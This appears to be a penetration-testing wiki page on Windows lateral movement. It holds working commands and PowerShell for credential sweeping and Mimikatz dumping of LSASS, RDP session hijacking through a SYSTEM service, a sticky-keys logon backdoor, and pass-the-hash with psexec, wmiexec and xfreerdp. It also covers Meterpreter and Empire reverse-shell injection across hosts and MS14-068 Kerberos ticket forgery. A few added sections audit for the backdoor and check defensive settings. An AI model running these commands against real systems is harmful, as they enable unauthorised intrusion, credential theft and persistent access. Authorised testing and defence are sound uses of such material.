Intro to Lateral Movement Techniques

Penetration Testing Wiki

To check whether the credentials $USER / $PASSWORD are valid on other computers in the network, sweep the range with crackmapexec: a [+] line means the login worked on that host, and (Pwn3d!) means the account is a local administrator there. --lusers additionally lists the users logged on to each host. Note that crackmapexec 4.x and later expect the protocol keyword after the command (crackmapexec smb ...), as in the PowerView example below; the other commands on this page use the older syntax.

crackmapexec $IP/24 -u $USER -p $PASSWORD --lusers

Or, with an Administrator hash, run the Mimikatz module on every host where the hash works to harvest clear-text passwords from LSASS (this needs local admin on the target, and only yields clear-text passwords where WDigest still stores them; see the 2018 update below):

crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/mimikatz.py

Run PowerView commands through crackmapexec's powerview module (the command executes on the target, so the account needs local admin there):

crackmapexec smb $IP -d $DOMAIN -u $LOGIN -p $PASS -M powerview -o COMMAND="Get-NetDomain" --verbose

Tunneling

Traffic encapsulation tools that wrap an arbitrary TCP stream in another protocol so deep packet inspection sees only HTTP or TLS:

http_tunnel (inside HTTP)
stunnel (inside TLS)

Lateral movement with RDP

Exploitation RDP 2011

Technique:
Any process running as NT AUTHORITY\SYSTEM on a host can attach to any other user's RDP or console session on that host without knowing that user's password (comparable to "su - user" as root on Linux). The legitimate user is disconnected from the session immediately, so the takeover is visible to them.

No extra tooling is needed: Task Manager's Users tab (right-click, Connect), tscon.exe or tsadmin.msc. Task Manager prompts for the session owner's password unless it runs as SYSTEM.

Method 1 (SYSTEM shell via PsExec, then tscon from it; $ID and $SESSIONNAME come from query user, see below)

psexec -s \\localhost cmd
tscon $ID /dest:$SESSIONNAME

Method 2 (a throw-away service, which runs as SYSTEM)

$ID is the target session's ID and $SESSIONNAME the name of your own session (console or rdp-tcp#N), both from query user. net start reports a timeout because cmd.exe is not a real service, but tscon has already run by then.

query user
sc create sesshijack binpath="cmd.exe /k tscon $ID /dest:$SESSIONNAME"
net start sesshijack

Method 3 (tscon directly: as a normal user you need the target session's password, as SYSTEM you do not; without /dest tscon attaches the target to the session it is run from)

query user

or:

quser
tscon $ID                     # as SYSTEM
tscon $ID /password:$PASS     # as a normal user, with the session owner's password
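Methods 1 to 3 as one PowerShell helper. This is an added example, not code from the original wiki: it parses query user (disconnected sessions have an empty SESSIONNAME column, which trips naive whitespace splitting), finds the session you are in, and creates the SYSTEM service from Method 2 to attach a chosen session to yours. The function names, the service name sesshijack and the -DestSessionName parameter are placeholders chosen here; it assumes an elevated prompt on the host that holds the sessions.

```powershell
# Added example; not part of the original wiki page. Assumes an elevated PowerShell
# prompt on the host holding the sessions. Function and service names are placeholders.

function Get-InteractiveSession {
    # Parse "query user". Our own row starts with ">". Disconnected sessions have an
    # empty SESSIONNAME column, so split on runs of two or more spaces and detect the
    # missing column by checking whether the second field is already the numeric ID.
    foreach ($line in (query user 2>$null | Select-Object -Skip 1)) {
        $current = $line.StartsWith('>')
        $f = $line.TrimStart('>').Trim() -split '\s{2,}'
        if ($f[1] -match '^\d+$') {
            $name = ''; $id = [int]$f[1]; $state = $f[2]       # disconnected: no session name
        } else {
            $name = $f[1]; $id = [int]$f[2]; $state = $f[3]    # active: console or rdp-tcp#N
        }
        [pscustomobject]@{
            UserName = $f[0]; SessionName = $name; Id = $id; State = $state; Current = $current
        }
    }
}

function Invoke-SessionHijack {
    # Method 2 above: the service runs as SYSTEM, so tscon needs no password. The
    # target session is attached to the destination session and its owner is kicked off.
    param(
        [Parameter(Mandatory)][int]$TargetId,   # ID column from query user
        [string]$DestSessionName,               # defaults to the session this runs in
        [string]$ServiceName = 'sesshijack'     # placeholder; any unused name works
    )
    if (-not $DestSessionName) {
        $mine = Get-InteractiveSession | Where-Object Current
        if (-not $mine) { throw 'Not in an interactive session; pass -DestSessionName (e.g. console).' }
        $DestSessionName = $mine.SessionName
    }
    $binPath = "cmd.exe /k tscon $TargetId /dest:$DestSessionName"
    sc.exe create $ServiceName binPath= $binPath | Out-Null
    # cmd.exe never reports to the SCM, so start fails with error 1053 after the
    # timeout; tscon has already executed by then. Delete the service afterwards.
    sc.exe start $ServiceName | Out-Null
    sc.exe delete $ServiceName | Out-Null
}

# Usage: list sessions, pick a disconnected one (State "Disc"), take it over.
Get-InteractiveSession | Format-Table -AutoSize
# Invoke-SessionHijack -TargetId 2
```

When run from a SYSTEM shell obtained with psexec -s (Method 1) there is no ">" row, because session 0 is not interactive; pass -DestSessionName with the name of your own session from the listing.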

Method 4 (physical access; a backdoor that survives reboots)

Sticky Keys (sethc.exe): register cmd.exe as the "debugger" for sethc.exe, so the logon screen launches a SYSTEM command prompt instead of Sticky Keys. Needs an administrator prompt, or the SOFTWARE hive loaded from boot media if you only have physical access.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Reboot, then press Shift five times at the logon screen to get the prompt.
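The check a defender (or a tester cleaning up) wants for this backdoor, as an added example that is not from the original wiki: it audits the Image File Execution Options keys of every accessibility binary reachable from the logon screen, and also catches the older variant where the binary itself is overwritten with a copy of cmd.exe. The function names are placeholders; it assumes an elevated prompt and an unmodified cmd.exe to compare against.

```powershell
# Added example; not part of the original wiki page. Audits the host for the sticky
# keys backdoor above and for the older variant where the accessibility binary itself
# is replaced by a copy of cmd.exe. Requires an elevated prompt to read/remove HKLM keys.

$AccessibilityBinaries = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                         'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Get-AccessibilityBackdoor {
    # Hash of cmd.exe, to recognise binaries that were simply overwritten with it
    # (an attacker who copied a different binary is only caught by the IFEO check).
    $cmdHash = (Get-FileHash "$env:SystemRoot\System32\cmd.exe" -Algorithm SHA256).Hash
    foreach ($exe in $AccessibilityBinaries) {
        $key = Join-Path $IfeoRoot $exe
        $debugger = $null
        if (Test-Path $key) {
            # Any Debugger value on these keys is a backdoor; they have no legitimate use here.
            $debugger = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
        }
        $path = "$env:SystemRoot\System32\$exe"
        $replaced = (Test-Path $path) -and ((Get-FileHash $path -Algorithm SHA256).Hash -eq $cmdHash)
        if ($debugger -or $replaced) {
            [pscustomobject]@{ Binary = $exe; IfeoDebugger = $debugger; ReplacedWithCmd = $replaced }
        }
    }
}

function Remove-AccessibilityBackdoor {
    # Undo the IFEO part only. A replaced binary must be restored from a trusted copy
    # (sfc /scannow does this), not deleted.
    param([Parameter(Mandatory)][string]$Binary)
    $key = Join-Path $IfeoRoot $Binary
    if (Test-Path $key) {
        Remove-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue
    }
}

# Usage: report findings; then e.g. Remove-AccessibilityBackdoor -Binary sethc.exe
Get-AccessibilityBackdoor
```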

Lateral movement with PTH (Pass The Hash)

Requirement:

Network NTLM authentication to the target. For psexec/smbexec-style execution that means SMB on port 445 (or 139) and admin rights, i.e. write access to ADMIN$ or C$; wmiexec needs admin rights over DCOM (135 plus a dynamic port) instead of a writeable share.

PTH from Linux

SMB

pth-winexe takes the hash as LM:NT; when no LM hash is available put the empty-LM value aad3b435b51404eeaad3b435b51404ee in its place. Impacket's -hashes takes the same LM:NT form, and the LM part may simply be left empty.

pth-winexe -U $DOMAIN/administrator%$LM_HASH:$NT_HASH //$IP cmd
crackmapexec --exec-method=smbexec -u Administrator -H $HASH -x cmd.exe $IP
python wmiexec.py -hashes :$NT_HASH $DOMAIN/$USER@$HOST

MS SQL

pth-sqsh -D$DATABASE_NAME -S$IP -U$SERVER_INSTANCE\\$USERNAME -mpretty

RDP

Works only if the target has Restricted Admin mode enabled (DisableRestrictedAdmin = 0 under HKLM\System\CurrentControlSet\Control\Lsa); otherwise the server rejects the NTLM logon and asks for a password.

xfreerdp /u:$USER /d:$DOMAIN /pth:$NTLM /v:$IP:3389

Metasploit

msf> use exploit/windows/smb/psexec

Crackmapexec + Meterpreter

First start the handler. LPORT must match the LPORT passed to the module; the reverse_https default is 8443, so set it explicitly:

msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set LHOST $LOCALIP
msf> set LPORT 444
msf> set exitonsession false
msf> exploit -j

Then inject Meterpreter on every host where the credentials give admin:

crackmapexec $IP -u administrator -p $PASS -M metinject -o LHOST=$LOCALIP LPORT=444

Crackmapexec + Empire

Start Empire's REST API, then point crackmapexec at it through ~/.cme/cme.conf:

python empire --rest --user empireadmin --pass Password123!

Edit ~/.cme/cme.conf:

[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123

LISTENER must name a listener that already exists in Empire:

crackmapexec $IP/24 -u username -p password -M empire_exec -o LISTENER=test

PTH from Windows

On Windows use Mimikatz or Impacket's wmiexec.py.

PTH with Mimikatz:

mimikatz.exe
mimikatz# privilege::debug
mimikatz# sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH

This opens a cmd.exe on the local machine whose logon session carries the given hash: anything started from it (net use, psexec, WMI, RDP) authenticates to remote hosts as $USER. The local token is unchanged, so whoami in that window still shows the original user. Add /run:<program> to launch something other than cmd.exe.

Check hashes against network

medusa -C pwdump.jd -M smbnt -H smb_hosts2.txt -m PASS:HASH -t 20 -T 10 2> /dev/null | tee medusa.smbnt
crackmapexec $IP/24 -u Administrator -H $HASH

2018 update

Problems with defence systems: UAC, SMB signing, WDigest, Credential Guard

UAC remote restrictions. This is the usual cause of STATUS_ACCESS_DENIED when the hash is right. Windows operating systems starting with Vista apply a User Account Control policy that gives local administrator accounts other than the built-in RID 500 Administrator a filtered (non-admin) token over the network, so psexec/wmiexec-style execution fails for them. To pass the hash of another local admin, disable the filter by creating a DWORD with value 1 (it usually does not exist):
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy" = 1
This applies to local accounts only; domain accounts in the local Administrators group are not filtered.

SMB signing. 1 means the server requires signed SMB. This blocks NTLM relay, not pass-the-hash: a client that knows the NT hash can derive the session key and sign.
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature" = 0

WDigest. With 1, LSASS keeps clear-text passwords that Mimikatz can read; with 0 (the default since Windows 8.1 / Server 2012 R2, and on older systems once KB2871997 is installed and the value is set) only hashes are left. This affects what you can harvest, not whether a hash can be passed.
"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"

Passing the hash does not work in all cases. Windows Defender Credential Guard keeps NTLM hashes and Kerberos keys in an isolated LSA process, so on such a host Mimikatz cannot dump them and there is nothing to pass from it, not even the Administrator hash. Credential Guard is a virtualization-based security feature, separate from the Defender antivirus; it is switched off through Group Policy or its UEFI lock, not by turning off Windows Defender. A hash obtained on another machine can still be passed to that host over the network, because Credential Guard protects the secrets stored on the host, not inbound NTLM authentication.
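The settings above as one check, an added example that is not from the original wiki: it reads the three registry values and the Credential Guard state on the local host and states what each one means for pass-the-hash against it, plus the attacker-side registry change from the paragraph above. The function names are placeholders; it assumes an elevated prompt (the Policies\System write needs admin).

```powershell
# Added example; not part of the original wiki page. Reads the settings discussed in
# this section on the local host and states what each means for pass-the-hash.
# Run elevated. Function names are placeholders chosen for this example.

function Get-PassTheHashPosture {
    $srv = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters' -ErrorAction SilentlyContinue
    $wd  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -ErrorAction SilentlyContinue
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -ErrorAction SilentlyContinue
    # Credential Guard is service 1 in SecurityServicesRunning (2 is HVCI).
    $dg  = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue

    [pscustomobject]@{
        # 1 = server requires signing. Stops NTLM relay; does NOT stop PTH, because a
        # client holding the NT hash can derive the signing key itself.
        SmbSigningRequired         = ($srv.RequireSecuritySignature -eq 1)
        # 1 = LSASS keeps clear-text passwords for Mimikatz. Absent means off on
        # Windows 8.1 / 2012 R2 and later; on older unpatched systems absent means on,
        # which this check does not model.
        WDigestClearTextInLsass    = ($wd.UseLogonCredential -eq 1)
        # 1 = remote UAC filtering disabled: every local admin, not only RID 500, gets
        # a full token over SMB/WMI. Absent or 0 gives STATUS_ACCESS_DENIED for other
        # local admins even with the correct hash. Domain accounts are never filtered.
        RemoteUacFilteringDisabled = ($pol.LocalAccountTokenFilterPolicy -eq 1)
        # Hashes live in LSAIso, so they cannot be dumped from this host; inbound PTH
        # against this host with a hash obtained elsewhere is unaffected.
        CredentialGuardRunning     = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))
    }
}

function Enable-RemoteLocalAdminToken {
    # The attacker-side change from the paragraph above. Needs admin on the box already
    # (RID 500 over the network, or an interactive session); creates the DWORD if missing.
    $p = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    New-ItemProperty -Path $p -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force | Out-Null
}

# Usage: inspect first; only call Enable-RemoteLocalAdminToken when the engagement allows it.
Get-PassTheHashPosture
```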

Lateral movement with PTT (Pass The Ticket)

Attack against an unpatched domain controller (MS14-068, pykek) with any valid domain user's NTLM hash and SID: the DC accepts a forged PAC, so the resulting TGT claims Domain Admins membership. Run the Python part from Linux or Windows, then inject the ticket with Mimikatz on the Windows host you pivot from.

whoami /user                                                  # gives the user's SID
python ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControllerAddr> --rc4 <ntlmHash>
python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc --rc4 <ntlmHash>
klist
klist purge                                                   # drop the existing tickets so the forged one is used
mimikatz.exe "kerberos::ptc TGT_<userName>@<domainName>.ccache" exit   # inject the .ccache pykek generated into memory
klist
net use \\$PDC\admin$
net use k: \\$PDC\c$
psexec \\$PDC cmd.exe
whoami /groups